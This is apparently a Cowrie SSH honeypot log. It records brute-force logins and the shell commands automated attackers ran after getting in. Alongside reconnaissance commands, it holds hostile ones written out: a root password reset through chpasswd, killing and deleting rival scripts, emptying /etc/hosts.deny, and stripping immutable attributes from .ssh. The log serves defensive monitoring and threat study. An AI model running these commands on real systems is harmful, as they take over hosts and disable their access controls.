{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:42.458790Z","src_ip":"212.227.235.229","session":"f490637418c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:42.716642Z","src_ip":"212.227.235.229","session":"f490637418c5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T12:54:43.788846Z","src_ip":"212.227.235.229","session":"f490637418c5"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd@12345","message":"login attempt [root/Passw0rd@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:54:43.961375Z","src_ip":"45.88.8.186","session":"75ddf8d0ed4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59375,"dst_ip":"1.2.3.4","dst_port":22,"session":"52473b74c751","protocol":"ssh","message":"New connection: 212.227.235.229:59375 (1.2.3.4:22) [session: 52473b74c751]","sensor":"my-vps","timestamp":"2025-08-26T12:54:44.124291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:44.124988Z","src_ip":"212.227.235.229","session":"52473b74c751"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:44.352069Z","src_ip":"212.227.235.229","session":"52473b74c751"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:45.007345Z","src_ip":"45.88.8.186","session":"75ddf8d0ed4a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:45.048249Z","src_ip":"212.227.235.229","session":"f490637418c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39298,"dst_ip":"1.2.3.4","dst_port":22,"session":"df78cc7d13eb","protocol":"ssh","message":"New connection: 212.227.235.229:39298 (1.2.3.4:22) [session: df78cc7d13eb]","sensor":"my-vps","timestamp":"2025-08-26T12:54:45.308389Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:54:45.309431Z","src_ip":"212.227.235.229","session":"df78cc7d13eb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:54:45.572549Z","src_ip":"212.227.235.229","session":"df78cc7d13eb"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:46.533160Z","src_ip":"212.227.235.229","session":"52473b74c751"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:54:46.660328Z","src_ip":"212.227.235.229","session":"df78cc7d13eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:46.812723Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T12:54:46.813406Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:46.922788Z","src_ip":"212.227.235.229","session":"df78cc7d13eb"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:46.925117Z","src_ip":"212.227.235.229","session":"a440a177a7c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:47.019249Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:47.506058Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"echo \"root:dIR3wIhvo3gJ\"|chpasswd|bash","message":"CMD: echo \"root:dIR3wIhvo3gJ\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T12:54:47.506765Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f13f9303691c25acd533aba219998e766fd03b278f032db39e5ed4274d3f32b8","size":21,"shasum":"f13f9303691c25acd533aba219998e766fd03b278f032db39e5ed4274d3f32b8","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f13f9303691c25acd533aba219998e766fd03b278f032db39e5ed4274d3f32b8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:47.728383Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:48.198253Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T12:54:48.199105Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T12:54:48.833671Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:48.834617Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:49.294787Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-26T12:54:49.295460Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:49.500839Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:49.975812Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-26T12:54:49.976493Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":30,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:50.181164Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:50.607451Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-26T12:54:50.608139Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-26T12:54:50.608918Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:50.828673Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:51.351498Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-26T12:54:51.352332Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:51.561542Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:51.986832Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T12:54:51.987620Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:52.192412Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:52.696715Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T12:54:52.697507Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:52.906905Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:53.384884Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T12:54:53.385725Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:53.601717Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:54.028818Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T12:54:54.029631Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:54.235630Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:54.743716Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T12:54:54.744402Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:54.948218Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:55.374922Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T12:54:55.375630Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:55.583509Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:56.087364Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T12:54:56.088053Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:56.292961Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:56.760167Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T12:54:56.760882Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:57.413890Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:54:57.838932Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T12:54:57.839603Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:58.045023Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.closed","duration":"22.5","message":"Connection lost after 22.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:54:58.046426Z","src_ip":"212.227.235.229","session":"fdabd0f860b8"}
{"eventid":"cowrie.session.closed","duration":30.69401478767395,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:55:04.796896Z","src_ip":"212.227.125.160","session":"8fa6880fdfd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45090,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0adab71fc2f","protocol":"ssh","message":"New connection: 212.227.235.229:45090 (1.2.3.4:22) [session: e0adab71fc2f]","sensor":"my-vps","timestamp":"2025-08-26T12:55:19.685970Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T12:55:19.686707Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T12:55:19.931639Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc.12345","message":"login attempt [root/Abc.12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:55:20.953249Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:55:21.503240Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:55:21.503936Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T12:55:21.505363Z","src_ip":"212.227.235.229","session":"e0adab71fc2f"}
